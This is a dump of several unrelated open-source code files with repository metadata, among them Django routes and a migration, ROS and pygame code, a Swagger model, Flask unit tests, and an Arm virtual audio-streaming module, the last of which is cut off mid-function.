path('<slug:btype>/<int:article_pk>/comments/<int:comment_pk>/delete/', views.comment_delete, name='comment_delete'),
path('<slug:btype>/<int:article_pk>/comments/<int:comment_pk>/delete/<int:comment2_pk>/delete/', views.comment2_delete,
name='comment2_delete'),
path("search1/<slug:btype>/<nickname>", views.search1, name="search1"),
path("search2/<slug:btype>/<content>", views.search2, name="search2"),
path("checknick/", views.checknick, name="checknick"),
path("checkuseremail/", views.checkuseremail, name="checkuseremail"),
path("getaccesstoken/", views.getaccesstoken, name="getaccesstoken"),
]
if settings.DEBUG:
urlpatterns += static(settings.MEDIA_URL, document_root = settings.MEDIA_ROOT)
urlpatterns += static(settings.STATIC_URL, document_root = settings.STATIC_ROOT) | [
"juhee.pak.06@gmail.com"
] | juhee.pak.06@gmail.com |
8e5e6be6ac17bd00c8bfbf3ae6596487c2f1e6f0 | 81acc9e75d36e76b984972c1e1227258a9cc7bb7 | /src/tagslam/src/camera_poses_to_kalibr.py | 376ee474306a1cfe9fcb1181c7f4ac47e38bc543 | [] | no_license | roshea6/SeniorD-RMC-2019 | 64cc377abc994cf984e4fac387382132f56b5bfb | e2978e4782455317cf1d56bdcdcefc766f950050 | refs/heads/master | 2020-08-25T04:52:23.863408 | 2020-05-09T00:16:24 | 2020-05-09T00:16:24 | 216,963,683 | 1 | 0 | null | 2020-05-09T00:16:25 | 2019-10-23T03:53:03 | C++ | UTF-8 | Python | false | false | 1,546 | py | #!/usr/bin/env python
#------------------------------------------------------------------------------
# convert camera_poses.yaml to kalibr format
#
# 2019 Bernd Pfrommer
import rospy
import tf
import argparse
import yaml
import numpy as np
def read_yaml(filename):
with open(filename, 'r') as y:
try:
return yaml.load(y)
except yaml.YAMLError as e:
print(e)
def rvec_tvec_to_mat(rvec, tvec):
l = np.linalg.norm(rvec)
n = rvec/l if l > 1e-8 else np.array([1.0, 0.0, 0.0])
T = tf.transformations.rotation_matrix(l, n)
T[0:3, 3] = tvec
return T
def print_tf(T):
for i in range(0,4):
x = T[i,:]
print ' - [%15.12f, %15.12f, %15.12f, %15.12f]' % \
(x[0], x[1], x[2], x[3])
if __name__ == '__main__':
parser = argparse.ArgumentParser(
description='convert camera_poses.yaml to kalibr transform')
parser.add_argument(
'--camera_poses', '-c', action='store', default=None, required=True,
help='name of camera_poses.yaml file')
args = parser.parse_args()
y = read_yaml(args.camera_poses)
T_w_cnm1 = np.eye(4)
for cam in sorted(y.keys()):
p = y[cam]['pose']['position']
pos = np.asarray([p['x'], p['y'], p['z']])
r = y[cam]['pose']['rotation']
rvec = np.asarray([r['x'], r['y'], r['z']])
T_w_cn = rvec_tvec_to_mat(rvec, pos)
print cam
print ' T_cn_cnm1:'
print_tf(np.matmul(np.linalg.inv(T_w_cn),T_w_cnm1))
T_w_cnm1 = T_w_cn
| [
"rpo1202@gmail.com"
] | rpo1202@gmail.com |
4b2ba632b93f63633f331cad76afd74773270c42 | dd659fea91ad861cfbb8936f4d6f256d550001e4 | /server/web/utils/error.py | 2e0c511231ebc094541f0c1fe8780478ea58574f | [] | no_license | wubinhong/deployer | 883e6b2b9d460575a62ad32f5624bd45879617aa | 4988241a92be058b827107f2874fc98a41629327 | refs/heads/master | 2023-05-14T21:32:40.333334 | 2021-06-04T14:57:06 | 2021-06-04T14:57:06 | 373,876,496 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 1,099 | py | # -*- coding:utf-8 -*-
__author__ = 'Binhong Wu'
class Error(Exception):
MAPS = {
10000: "income parameters error",
10001: "project not exists.",
10002: "host not exists.",
10003: "user not exists.",
10004: "deploy permission denied.",
10005: "Incomplete parameter",
# 远端shell部分
11000: "pre deploy shell called exception",
11001: "post deploy shell called exception",
11002: "restart shell called exception",
11003: "rsync called exception",
# 本地shell部分
12000: "git repo clone exception",
# 用户部分
13000: "username or password incorrect",
13001: "user not exists",
13002: "user exists",
13003: "password not matched",
# 权限校验
14000: "user not login",
}
def __init__(self, code, msg=None):
self.code = code
if msg is None:
self.msg = self.MAPS[code]
else:
self.msg = msg
def __repr__(self):
return "%s: %s" % (self.code, self.msg)
| [
"wubinhong2012@gmail.com"
] | wubinhong2012@gmail.com |
eb9043e33499f259c6e2b6bb7325bd69fbbfaa33 | c760996cb71732a8396051c1032de9740b3a0c3f | /ship.py | d476053748e4de4aabd8e0383cf406d51504d75d | [] | no_license | L-eo/alien_invasion | f484263b101bd104a6c2cf64f5d7661e1d5fcd2d | 6a991a9340fa263d9d75bdefda045fdc329b9de1 | refs/heads/master | 2021-08-23T02:20:27.191720 | 2017-12-02T13:21:07 | 2017-12-02T13:21:07 | 112,843,814 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,874 | py | import pygame
from pygame.sprite import Sprite
class Ship(Sprite):
def __init__(self, ai_settings, screen):
"""初始化飞船并设置其初始位置"""
super().__init__()
self.screen = screen
# 加载飞船图像并获取其外接矩形
self.image = pygame.image.load('images/ship.png')
self.rect = self.image.get_rect()
self.screen_rect = screen.get_rect()
self.ai_settings = ai_settings
# 将每艘新飞船放在屏幕底部中央
self.rect.centerx = self.screen_rect.centerx
self.rect.bottom = self.screen_rect.bottom
# 在飞船的属性center中存储小数值
self.center = float(self.rect.centerx)
self.bottom = float(self.rect.bottom)
# 移动标志
self.moving_right = False
self.moving_left = False
self.moving_up = False
self.moving_down = False
def update(self):
"""根据移动标志调整飞船的位置"""
if self.moving_right and self.rect.right<self.screen_rect.right:
self.center += self.ai_settings.ship_speed
if self.moving_left and self.rect.left>0:
self.center -= self.ai_settings.ship_speed
if self.moving_up and self.rect.top>0:
self.bottom -= self.ai_settings.ship_speed
if self.moving_down and self.rect.bottom<self.screen_rect.bottom:
self.bottom += self.ai_settings.ship_speed
# 根据self.center更新rect对象
self.rect.centerx = self.center
self.rect.bottom = self.bottom
def blitme(self):
"""在指定位置绘制飞船"""
self.screen.blit(self.image, self.rect)
def center_ship(self):
"""让飞船在屏幕底端中央"""
self.center = self.screen_rect.centerx
self.bottom = self.screen_rect.bottom
| [
"33517904+L-eo@users.noreply.github.com"
] | 33517904+L-eo@users.noreply.github.com |
39e20ac90186dc531aa10fe85562848f05598678 | 25f76378e8d451785efda3c12d8505d1e1f7f73f | /__init__.py | 1cc26b8ec1086e65c79e6e66aef26a02c63ea56c | [] | no_license | sikattin/python_sqlite3 | b030bbad955f34e4d09ddeb68f38b36aed389341 | ce6184ab2a3867f77a05d51fccc1d8465871966d | refs/heads/master | 2021-01-01T18:09:59.324372 | 2017-07-25T05:18:42 | 2017-07-25T05:18:42 | 98,265,911 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 41 | py | """.
initialize sqlite3_db package.
"""
| [
"distortion0mix@gmail.com"
] | distortion0mix@gmail.com |
5c22c50092409f049081caf5752155a483abf51f | 6656c2acc607d269870d04d310e8a35ebbad8d3f | /lib/python2.7/dist-packages/pr2_mechanism_controllers/msg/_Odometer.py | 3a8c8d7ac9f8a3aacb42386f5ce327b54bf4e2bf | [] | no_license | uml-comp4510-5490/install | 97bd8b643773e34f3956e40ac169729a45e34bbe | 2897bf668177aced2e58cac18e86b109716c01df | refs/heads/master | 2020-04-01T05:59:56.541628 | 2018-10-14T01:52:57 | 2018-10-14T01:52:57 | 152,929,072 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,835 | py | # This Python file uses the following encoding: utf-8
"""autogenerated by genpy from pr2_mechanism_controllers/Odometer.msg. Do not edit."""
import sys
python3 = True if sys.hexversion > 0x03000000 else False
import genpy
import struct
class Odometer(genpy.Message):
_md5sum = "1f1d53743f4592ee455aa3eaf9019457"
_type = "pr2_mechanism_controllers/Odometer"
_has_header = False #flag to mark the presence of a Header object
_full_text = """float64 distance #total distance traveled (meters)
float64 angle #total angle traveled (radians)"""
__slots__ = ['distance','angle']
_slot_types = ['float64','float64']
def __init__(self, *args, **kwds):
"""
Constructor. Any message fields that are implicitly/explicitly
set to None will be assigned a default value. The recommend
use is keyword arguments as this is more robust to future message
changes. You cannot mix in-order arguments and keyword arguments.
The available fields are:
distance,angle
:param args: complete set of field values, in .msg order
:param kwds: use keyword arguments corresponding to message field names
to set specific fields.
"""
if args or kwds:
super(Odometer, self).__init__(*args, **kwds)
#message fields cannot be None, assign default values for those that are
if self.distance is None:
self.distance = 0.
if self.angle is None:
self.angle = 0.
else:
self.distance = 0.
self.angle = 0.
def _get_types(self):
"""
internal API method
"""
return self._slot_types
def serialize(self, buff):
"""
serialize message into buffer
:param buff: buffer, ``StringIO``
"""
try:
_x = self
buff.write(_get_struct_2d().pack(_x.distance, _x.angle))
except struct.error as se: self._check_types(struct.error("%s: '%s' when writing '%s'" % (type(se), str(se), str(locals().get('_x', self)))))
except TypeError as te: self._check_types(ValueError("%s: '%s' when writing '%s'" % (type(te), str(te), str(locals().get('_x', self)))))
def deserialize(self, str):
"""
unpack serialized message in str into this message instance
:param str: byte array of serialized message, ``str``
"""
try:
end = 0
_x = self
start = end
end += 16
(_x.distance, _x.angle,) = _get_struct_2d().unpack(str[start:end])
return self
except struct.error as e:
raise genpy.DeserializationError(e) #most likely buffer underfill
def serialize_numpy(self, buff, numpy):
"""
serialize message with numpy array types into buffer
:param buff: buffer, ``StringIO``
:param numpy: numpy python module
"""
try:
_x = self
buff.write(_get_struct_2d().pack(_x.distance, _x.angle))
except struct.error as se: self._check_types(struct.error("%s: '%s' when writing '%s'" % (type(se), str(se), str(locals().get('_x', self)))))
except TypeError as te: self._check_types(ValueError("%s: '%s' when writing '%s'" % (type(te), str(te), str(locals().get('_x', self)))))
def deserialize_numpy(self, str, numpy):
"""
unpack serialized message in str into this message instance using numpy for array types
:param str: byte array of serialized message, ``str``
:param numpy: numpy python module
"""
try:
end = 0
_x = self
start = end
end += 16
(_x.distance, _x.angle,) = _get_struct_2d().unpack(str[start:end])
return self
except struct.error as e:
raise genpy.DeserializationError(e) #most likely buffer underfill
_struct_I = genpy.struct_I
def _get_struct_I():
global _struct_I
return _struct_I
_struct_2d = None
def _get_struct_2d():
global _struct_2d
if _struct_2d is None:
_struct_2d = struct.Struct("<2d")
return _struct_2d
| [
"james.perl12@gmail.com"
] | james.perl12@gmail.com |
7405b916f1b736e3577a6182f2df6a0a43bd5b87 | 36017343e096c0623e901a6f74108483c4d080b0 | /main.py | 461c48d3ad42842320b41ca6fc2f9821001e6340 | [] | no_license | carlosanghez/arcade | 00e420c4a6bb6d191810fb82db0afff66a3eb692 | 5630a906b8f5e271ab04154c97d1f89e96553cf0 | refs/heads/master | 2023-02-04T02:21:15.520403 | 2020-12-26T11:11:57 | 2020-12-26T11:11:57 | 323,635,500 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 794 | py | print("hello")
mySprite = sprites.create(img("""
. . 2 2 b b b b b . . . . . . .
. 2 b 4 4 4 4 4 4 b . . . . . .
2 2 4 4 4 4 d d 4 4 b . . . . .
2 b 4 4 4 4 4 4 d 4 b . . . . .
2 b 4 4 4 4 4 4 4 d 4 b . . . .
2 b 4 4 4 4 4 4 4 4 4 b . . . .
2 b 4 4 4 4 4 4 4 4 4 e . . . .
2 2 b 4 4 4 4 4 4 4 b e . . . .
. 2 b b b 4 4 4 b b b e . . . .
. . e b b b b b b b e e . . . .
. . . e e b 4 4 b e e e b . . .
. . . . . e e e e e e b d b b .
. . . . . . . . . . . b 1 1 1 b
. . . . . . . . . . . c 1 d d b
. . . . . . . . . . . c 1 b c .
. . . . . . . . . . . . c c . .
"""),
SpriteKind.food) | [
"carlosanghez@gmail.com"
] | carlosanghez@gmail.com |
463634d045761a2bc6089838b2810c79f55472c6 | e519a3134e5242eff29a95a05b02f8ae0bfde232 | /services/control-tower/vendor/riffyn-sdk/swagger_client/models/apply_config_body_manual_data.py | aa75dfca4effe3afe375954d8a1513babe352a82 | [] | no_license | zoltuz/lab-automation-playground | ba7bc08f5d4687a6daa64de04c6d9b36ee71bd3e | 7a21f59b30af6922470ee2b20651918605914cfe | refs/heads/master | 2023-01-28T10:21:51.427650 | 2020-12-04T14:13:13 | 2020-12-05T03:27:16 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 8,229 | py | # coding: utf-8
"""
Riffyn REST API
### Vocabulary Before you begin, please familiarize yourself with our [Glossary of Terms](https://help.riffyn.com/hc/en-us/articles/360045503694). ### Getting Started If you'd like to play around with the API, there are several free GUI tools that will allow you to send requests and receive responses. We suggest using the free app [Postman](https://www.getpostman.com/). ### Authentication Begin with a call the [authenticate](/#api-Authentication-authenticate) endpoint using [HTTP Basic authentication](https://en.wikipedia.org/wiki/Basic_access_authentication) with your `username` and `password` to retrieve either an API Key or an Access Token. For example: curl -X POST -u '<username>' https://api.app.riffyn.com/v1/auth -v You may then use either the API Key or the accessToken for all future requests to the API. For example: curl -H 'access-token: <ACCESS_TOKEN>' https://api.app.riffyn.com/v1/units -v curl -H 'api-key: <API_KEY>' https://api.app.riffyn.com/v1/units -v The tokens' values will be either in the message returned by the `/authenticate` endpoint or in the createApiKey `/auth/api-key` or CreateAccesToken `/auth/access-token` endpoints. The API Key will remain valid until it is deauthorized by revoking it through the Security Settings in the Riffyn App UI. The API Key is best for running scripts and longer lasting interactions with the API. The Access Token will expire automatically and is best suited to granting applications short term access to the Riffyn API. Make your requests by sending the HTTP header `api-key: $API_KEY`, or `access-token: $ACCESS_TOKEN`. In Postman, add your prefered token to the headers under the Headers tab for any request other than the original request to `/authenticate`. If you are enrolled in MultiFactor Authentication (MFA) the `status` returned by the `/authenticate` endpoint will be `MFA_REQUIRED`. A `passCode`, a `stateToken`, and a `factorId` must be passed to the [/verify](/#api-Authentication-verify) endpoint to complete the authentication process and achieve the `SUCCESS` status. MFA must be managed in the Riffyn App UI. ### Paging and Sorting The majority of endpoints that return a list of data support paging and sorting through the use of three properties, `limit`, `offset`, and `sort`. Please see the list of query parameters, displayed below each endpoint's code examples, to see if paging or sorting is supported for that specific endpoint. Certain endpoints return data that's added frequently, like resources. As a result, you may want filter results on either the maximum or minimum creation timestamp. This will prevent rows from shifting their position from the top of the list, as you scroll though subsequent pages of a multi-page response. Before querying for the first page, store the current date-time (in memory, a database, a file...). On subsequent pages you *may* include the `before` query parameter, to limit the results to records created before that date-time. E.g. before loading page one, you store the current date time of `2016-10-31T22:00:00Z` (ISO date format). Later, when generating the URL for page two, you *could* limit the results by including the query parameter `before=1477951200000` (epoch timestamp). ### Postman endpoint examples There is a YAML file with the examples of the request on Riffyn API [Click here](/collection) to get the file. If you don't know how to import the collection file, [here](https://learning.postman.com/docs/postman/collections/data-formats/#importing-postman-data) are the steps. ### Client SDKs You may write your own API client, or you may use one of ours. [Click here](/clients) to select your programming language and download an API client. # noqa: E501
OpenAPI spec version: 1.4.0
Contact: support@riffyn.com
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
import pprint
import re # noqa: F401
import six
class ApplyConfigBodyManualData(object):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
"""
"""
Attributes:
swagger_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
swagger_types = {
'manual_data_id': 'str',
'value': 'str'
}
attribute_map = {
'manual_data_id': 'manualDataId',
'value': 'value'
}
def __init__(self, manual_data_id=None, value=None): # noqa: E501
"""ApplyConfigBodyManualData - a model defined in Swagger""" # noqa: E501
self._manual_data_id = None
self._value = None
self.discriminator = None
if manual_data_id is not None:
self.manual_data_id = manual_data_id
if value is not None:
self.value = value
@property
def manual_data_id(self):
"""Gets the manual_data_id of this ApplyConfigBodyManualData. # noqa: E501
The id of the manual data such as `manual|MDQi5Neznum3gXye3`. # noqa: E501
:return: The manual_data_id of this ApplyConfigBodyManualData. # noqa: E501
:rtype: str
"""
return self._manual_data_id
@manual_data_id.setter
def manual_data_id(self, manual_data_id):
"""Sets the manual_data_id of this ApplyConfigBodyManualData.
The id of the manual data such as `manual|MDQi5Neznum3gXye3`. # noqa: E501
:param manual_data_id: The manual_data_id of this ApplyConfigBodyManualData. # noqa: E501
:type: str
"""
self._manual_data_id = manual_data_id
@property
def value(self):
"""Gets the value of this ApplyConfigBodyManualData. # noqa: E501
The value being set for the manual data. Values will be cast to the valueType of the property they are being written to. Datetimes should be supplied in ISO-8601 format (2019-05-30T15:37:54+00:00). # noqa: E501
:return: The value of this ApplyConfigBodyManualData. # noqa: E501
:rtype: str
"""
return self._value
@value.setter
def value(self, value):
"""Sets the value of this ApplyConfigBodyManualData.
The value being set for the manual data. Values will be cast to the valueType of the property they are being written to. Datetimes should be supplied in ISO-8601 format (2019-05-30T15:37:54+00:00). # noqa: E501
:param value: The value of this ApplyConfigBodyManualData. # noqa: E501
:type: str
"""
self._value = value
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.swagger_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
if issubclass(ApplyConfigBodyManualData, dict):
for key, value in self.items():
result[key] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, ApplyConfigBodyManualData):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""Returns true if both objects are not equal"""
return not self == other
| [
"jaceys.tan@gmail.com"
] | jaceys.tan@gmail.com |
d57ef9be514e2ce63c48d67c80336251d0f3da59 | 47d04c8ce72c247d306cdede90b09877407665c3 | /ask_trubnikov/question/migrations/0010_auto_20170501_0231.py | 1d93cd20165d472ac86282c0bdf482ec623be080 | [] | no_license | TrubnikovDmitriy/web-task-2 | 00cf7c98698ef3d47753968c3d086bf8820cba04 | 49a95df6828176023f955f9c8e2dd37aa90d257b | refs/heads/master | 2021-01-19T11:33:06.139051 | 2017-06-21T17:38:43 | 2017-06-21T17:38:43 | 87,977,301 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 490 | py | # -*- coding: utf-8 -*-
# Generated by Django 1.11 on 2017-05-01 02:31
from __future__ import unicode_literals
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('question', '0009_auto_20170501_0231'),
]
operations = [
migrations.RemoveField(
model_name='answer',
name='seq',
),
migrations.RemoveField(
model_name='answer',
name='seq1',
),
]
| [
"trubnikovdv@mail.ru"
] | trubnikovdv@mail.ru |
b7e7da09b42e464cfd960d7d71f876dc9de023f7 | 9f963f6a52c13eaabf0e53157636a9fb63b6f22f | /.venv/bin/django-admin | 757df18de10fe6021c495761ad7b492424d1212e | [] | no_license | sean-mcgimpsey/passwd | 278547104b2b8c5ce4646fbe549a807e642e8c43 | 0b142eaa663494d9cda8ae4714adbb44c9ef06a2 | refs/heads/master | 2022-11-30T13:52:22.841733 | 2020-08-17T21:21:07 | 2020-08-17T21:21:07 | 288,255,580 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 292 | #!/home/sean/projects/password/.venv/bin/python
# -*- coding: utf-8 -*-
import re
import sys
from django.core.management import execute_from_command_line
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw|\.exe)?$', '', sys.argv[0])
sys.exit(execute_from_command_line())
| [
"sean.mcgimpsey@maruedr.com"
] | sean.mcgimpsey@maruedr.com | |
1b57a02ddad0c5b539cdf0671106d70c0eaaf546 | 7480095c156078bb8a70dfd365836eccb0ffdeb3 | /paarity_outliner.py | 563d0d50f33e79e2c3cc376362d4c3b1c55d66cf | [] | no_license | Ashish265/Kata | 78a58734afea9f0a2bf21b8ab2dd42380eb2dfa5 | ea64e083f4a55d3bafc2fbf3f0745f7c3cbdd46f | refs/heads/master | 2021-05-11T10:03:17.820018 | 2020-07-22T17:58:47 | 2020-07-22T17:58:47 | 118,091,717 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 552 | py | def find_outlier(integers):
l=len(integers)
temp=""
count=0
if l<3:
return False
else :
for i in range(l):
if (integers[i]%2==0):
count=count+1
if (count>=2):
for i in range(l):
if (integers[i]%2==0):
continue
else:
print(integers[i])
else:
for i in range(l):
if (integers[i]%2==0):
print(integers[i])
else:
continue
find_outlier([2, 4, 6, 8, 10, 3])
find_outlier([2, 4, 0, 100, 4, 11, 2602, 36])
find_outlier([160, 3, 1719, 19, 11, 13, -21])
| [
"noreply@github.com"
] | Ashish265.noreply@github.com |
3be89ddf961eef7c4996cb5042ca247db7037bb1 | 001f70eb08670694976e182794cb842c1c1536a8 | /tests/test_unit.py | c10ce587dc54f6e3b642bd62ab75ce44a8111935 | [] | no_license | hitesh70738/Final_project_crud_app | 0c04623739b25b1b7527374f4faf8c3f7ba35975 | 6292c4673a63bc7862d9964ba4650004ce46dd6e | refs/heads/main | 2023-02-09T07:26:37.289238 | 2021-01-05T15:07:12 | 2021-01-05T15:07:12 | 323,407,030 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,965 | py | import unittest
from flask import url_for
from flask_testing import TestCase
from application import app, db
from application.models import Teams, Players
class TestBase(TestCase):
def create_app(self):
app.config.update(SQLALCHEMY_DATABASE_URI="sqlite:///data.db",
SECRET_KEY='TEST_SECRET_KEY',
DEBUG=True
)
return app
def setUp(self):
db.create_all()
test_team = Teams(team_name="team name", sponsor="Emirates")
db.session.add(test_team)
db.session.commit()
def tearDown(self):
db.session.remove()
db.drop_all()
class TestViews(TestBase):
def test_home_get(self):
response = self.client.get(url_for("home"))
self.assertEqual(response.status_code, 200)
def test_create_get(self):
response = self.client.get(url_for('create'))
self.assertEqual(response.status_code, 200)
def test_update_get(self):
response = self.client.get(url_for('update', id=1), follow_redirects=True)
self.assertEqual(response.status_code,200)
def test_add_get(self):
response = self.client.get(url_for('add', id=1), follow_redirects=True)
self.assertEqual(response.status_code,200)
def test_delete_get(self):
response = self.client.get(url_for('delete', id=1), follow_redirects=True)
self.assertEqual(response.status_code,200)
class TestRead(TestBase):
def test_read_tasks(self):
response = self.client.get(url_for("home"))
self.assertIn(b"team name", response.data)
class TestCreate(TestBase):
def test_create_task(self):
response = self.client.post(url_for("create"),
data=dict(team_name="New team", sponsor="Emirates"),
follow_redirects=True
)
self.assertIn(b"New team", response.data)
self.assertIn(b"Emirates", response.data)
class TestUpdate(TestBase):
def test_update_task(self):
response = self.client.post(url_for("update", id=1),
data=dict(team_name="Updated name", sponsor="updated sponsor"),
follow_redirects=True
)
self.assertIn(b"Updated name", response.data)
self.assertIn(b"updated sponsor", response.data)
class TestAdd(TestBase):
def test_add_task(self):
response = self.client.post(url_for("add", id=1),
data=dict(name="add name", position='CM', club='club', height='1.77'),
follow_redirects=True
)
self.assertIn(b"add name", response.data)
self.assertIn(b"CM", response.data)
self.assertIn(b"club", response.data)
self.assertIn(b"1.77", response.data)
class TestDelete(TestBase):
def test_update_task(self):
response = self.client.get(url_for("delete", id=1),
follow_redirects=True
)
self.assertNotIn(b"team name", response.data)
self.assertNotIn(b"Emirates", response.data) | [
"hitesh70738@gmail.com"
] | hitesh70738@gmail.com |
61f7e1110562904492dddc8c101dfdb04a9f0b79 | 2009735d19318a3ffe8e56687efb8e7688ebaf5a | /models/final_experiment_scripts/MIMIC/LoS/channel_wise_lstm.py | 672a261444acf134a165a8bd320b316b08fb5d3f | [
"MIT"
] | permissive | weikunzz/TPC-LoS-prediction | 7bb9865e2f0fa3b461cb6fc23ed49996bfba59c1 | 30770f3e75d6a2a725c422b837f7ec864708f5d9 | refs/heads/master | 2023-04-06T10:19:12.284137 | 2021-04-08T14:06:53 | 2021-04-08T14:06:53 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 834 | py | from eICU_preprocessing.split_train_test import create_folder
from models.run_lstm import BaselineLSTM
from models.initialise_arguments import initialise_lstm_arguments
from models.final_experiment_scripts.best_hyperparameters import best_cw_lstm
if __name__=='__main__':
c = initialise_lstm_arguments()
c['exp_name'] = 'ChannelwiseLSTM'
c['dataset'] = 'MIMIC'
c = best_cw_lstm(c)
log_folder_path = create_folder('models/experiments/final/MIMIC/LoS', c.exp_name)
channelwise_lstm = BaselineLSTM(config=c,
n_epochs=c.n_epochs,
name=c.exp_name,
base_dir=log_folder_path,
explogger_kwargs={'folder_format': '%Y-%m-%d_%H%M%S{run_number}'})
channelwise_lstm.run() | [
"ecr38@cam.ac.uk"
] | ecr38@cam.ac.uk |
828e36ca6a8ff4e76f37661719c06a120b754ff2 | f42f4835eaeb0e1b6e19a7d56ba96673f532587a | /VSI/audio/python/arm_vsi1.py | db933c222a90918459468f754d1f778f7f9a52ba | [
"Apache-2.0"
] | permissive | Envoid/VHT-TFLmicrospeech | 20b8ed9ec1cdc775bc3c7764cc91f23f618ce92e | 3928718dd89e1f394c0288a0a9ba80e00dcdf01c | refs/heads/main | 2023-08-29T19:12:57.678718 | 2021-10-07T06:05:13 | 2021-10-07T06:05:13 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,102 | py | # Copyright (c) 2021 Arm Limited. All rights reserved.
# Virtual Streaming Interface instance 1 Python script: Audio Output
##@addtogroup arm_vsi1_py_audio_out
# @{
#
##@package arm_vsi1_audio_out
#Documentation for VSI Audio Output module.
#
#More details.
import logging
import wave
## Set verbosity level
#verbosity = logging.DEBUG
verbosity = logging.ERROR
# [debugging] Verbosity settings
level = { 10: "DEBUG", 20: "INFO", 30: "WARNING", 40: "ERROR" }
logging.basicConfig(format='Py: VSI1: [%(levelname)s]\t%(message)s', level = verbosity)
logging.info("Verbosity level is set to " + level[verbosity])
# IRQ registers
IRQ_Status = 0
# Timer registers
Timer_Control = 0
Timer_Interval = 0
# Timer Control register definitions
Timer_Control_Run_Msk = 1<<0
Timer_Control_Periodic_Msk = 1<<1
Timer_Control_Trig_IRQ_Msk = 1<<2
Timer_Control_Trig_DMA_Msk = 1<<3
# DMA registers
DMA_Control = 0
# DMA Control register definitions
DMA_Control_Enable_Msk = 1<<0
DMA_Control_Direction_Msk = 1<<1
DMA_Control_Direction_P2M = 0<<1
DMA_Control_Direction_M2P = 1<<1
# User registers
Regs = [0] * 64
CONTROL = 0 # Regs[0]
CHANNELS = 0 # Regs[1]
SAMPLE_BITS = 0 # Regs[2]
SAMPLE_RATE = 0 # Regs[3]
# User CONTROL register definitions
CONTROL_ENABLE_Msk = 1<<0
# Data buffer
Data = bytearray()
# Audio Frames
AudioFrames = bytearray()
## Open WAVE file (store object into global WAVE object)
# @param name name of WAVE file to open
def openWAVE(name):
global WAVE
logging.info("Open WAVE file (write mode): {}".format(name))
WAVE = wave.open(name, 'wb')
WAVE.setnchannels(CHANNELS)
WAVE.setsampwidth((SAMPLE_BITS + 7) // 8)
WAVE.setframerate(SAMPLE_RATE)
logging.info(" Number of channels: {}".format(CHANNELS))
logging.info(" Sample bits: {}".format(SAMPLE_BITS))
logging.info(" Sample rate: {}".format(SAMPLE_RATE))
## Write WAVE frames (global WAVE object) from global AudioFrames object
def writeWAVE():
global WAVE, AudioFrames
logging.info("Write WAVE frames")
WAVE.writeframes(AudioFrames)
## Close WAVE file (global WAVE object)
def closeWAVE():
global WAVE
logging.info("Close WAVE file")
WAVE.close()
## Store audio frames from global Data buffer
# @param block_size size of block to store (in bytes)
def storeAudioFrames(block_size):
global AudioFrames, Data
logging.info("Store audio frames from data buffer")
frame_size = CHANNELS * ((SAMPLE_BITS + 7) // 8)
frames_max = block_size // frame_size
AudioFrames = Data
writeWAVE()
## Initialize
def init():
logging.info("Python function init() called")
## Read interrupt request (the VSI IRQ Status Register)
# @return value value read (32-bit)
def rdIRQ():
global IRQ_Status
logging.info("Python function rdIRQ() called")
value = IRQ_Status
logging.debug("Read interrupt request: {}".format(value))
return value
## Write interrupt request (the VSI IRQ Status Register)
# @param value value to write (32-bit)
# @return value value written (32-bit)
def wrIRQ(value):
global IRQ_Status
logging.info("Python function wrIRQ() called")
IRQ_Status = value
logging.debug("Write interrupt request: {}".format(value))
return value
## Write Timer registers (the VSI Timer Registers)
# @param index Timer register index (zero based)
# @param value value to write (32-bit)
# @return value value written (32-bit)
def wrTimer(index, value):
global Timer_Control, Timer_Interval
logging.info("Python function wrTimer() called")
if index == 0:
Timer_Control = value
logging.debug("Write Timer_Control: {}".format(value))
elif index == 1:
Timer_Interval = value
logging.debug("Write Timer_Interval: {}".format(value))
return value
## Timer event (called at Timer Overflow)
def timerEvent():
logging.info("Python function timerEvent() called")
## Write DMA registers (the VSI DMA Registers)
# @param index DMA register index (zero based)
# @param value value to write (32-bit)
# @return value value written (32-bit)
def wrDMA(index, value):
global DMA_Control
logging.info("Python function wrDMA() called")
if index == 0:
DMA_Control = value
logging.debug("Write DMA_Control: {}".format(value))
return value
## Read data from peripheral for DMA P2M transfer (VSI DMA)
# @param size size of data to read (in bytes, multiple of 4)
# @return data data read (bytearray)
def rdDataDMA(size):
global Data
logging.info("Python function rdDataDMA() called")
n = min(len(Data), size)
data = bytearray(size)
data[0:n] = Data[0:n]
logging.debug("Read data ({} bytes)".format(size))
return data
## Write data to peripheral for DMA M2P transfer (VSI DMA)
# @param data data to write (bytearray)
# @param size size of data to write (in bytes, multiple of 4)
def wrDataDMA(data, size):
global Data
logging.info("Python function wrDataDMA() called")
Data = data
logging.debug("Write data ({} bytes)".format(size))
storeAudioFrames(size)
return
## Write CONTROL register (user register)
# @param value value to write (32-bit)
def wrCONTROL(value):
global CONTROL
if ((value ^ CONTROL) & CONTROL_ENABLE_Msk) != 0:
if (value & CONTROL_ENABLE_Msk) != 0:
logging.info("Enable Transmitter")
openWAVE('test.wav')
else:
